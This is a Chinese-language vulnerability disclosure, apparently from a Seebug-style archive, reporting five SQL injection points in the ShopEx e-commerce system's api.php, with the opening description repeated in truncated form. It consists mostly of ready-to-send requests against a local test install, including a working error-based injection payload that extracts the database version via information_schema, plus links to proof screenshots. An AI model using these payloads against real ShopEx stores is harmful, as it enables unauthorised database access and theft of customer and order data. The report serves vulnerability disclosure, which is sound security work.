### 简要描述: 不知道我有不有搞错,但已经尽量下载了最新版了。。。 在很多地方测试都存在。。。 ShopEx最新版多处SQL注射 ### 详细说明: 我很怀疑自己是不是搞错呢。。。 注射1: http://127.0.0.1:5656/shopex/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)# 注射2: http://127.0.0.1:5656/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"} 注射3: http://127.0.0.1:5656/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx 注射4: http://127.0.0.1:5656/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1 注射5: http://127.0.0.1:5656/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx ### 漏洞证明: [<img src="https://images.seebug.org/upload/201306/2015341538cd1117bd1ef1d50b665b62173072c0.jpg" alt="1.jpg" width="600"...
### 简要描述: 不知道我有不有搞错,但已经尽量下载了最新版了。。。 在很多地方测试都存在。。。 ShopEx最新版多处SQL注射 ### 详细说明: 我很怀疑自己是不是搞错呢。。。 注射1: http://127.0.0.1:5656/shopex/api.php POST act=search_sub_regions&api_version=1.0&return_data=string&p_region_id=22 and (select 1 from(select count(*),concat(0x7c,(select (Select version()) from information_schema.tables limit 0,1),0x7c,floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)# 注射2: http://127.0.0.1:5656/shopex/api.php act=add_category&api_version=3.1&datas={"name":"name' and 1=x %23"} 注射3: http://127.0.0.1:5656/shopex/api.php act=get_spec_single&api_version=3.1&spec_id=1 xxx 注射4: http://127.0.0.1:5656/shopex/api.php act=online_pay_center&api_version=1.0&order_id=1x&pay_id=1¤cy=1 注射5: http://127.0.0.1:5656/shopex/api.php act=search_dly_h_area&return_data=string&columns=xxxxx ### 漏洞证明: [<img src="https://images.seebug.org/upload/201306/2015341538cd1117bd1ef1d50b665b62173072c0.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/2015341538cd1117bd1ef1d50b665b62173072c0.jpg) [<img src="https://images.seebug.org/upload/201306/2015342483e9fe214eaf25237cd38e18507907b7.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/2015342483e9fe214eaf25237cd38e18507907b7.jpg) [<img src="https://images.seebug.org/upload/201306/20153433c22f71fb7aa94e1f4d5cea88dab5fa61.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/20153433c22f71fb7aa94e1f4d5cea88dab5fa61.jpg) [<img src="https://images.seebug.org/upload/201306/20153446de448549d0ec43e27d0e38eb7032cb4b.jpg" alt="4.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/20153446de448549d0ec43e27d0e38eb7032cb4b.jpg) [<img src="https://images.seebug.org/upload/201306/201534584afd9934db8e4f3da5e176a611ae01e6.jpg" alt="5.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201306/201534584afd9934db8e4f3da5e176a611ae01e6.jpg)
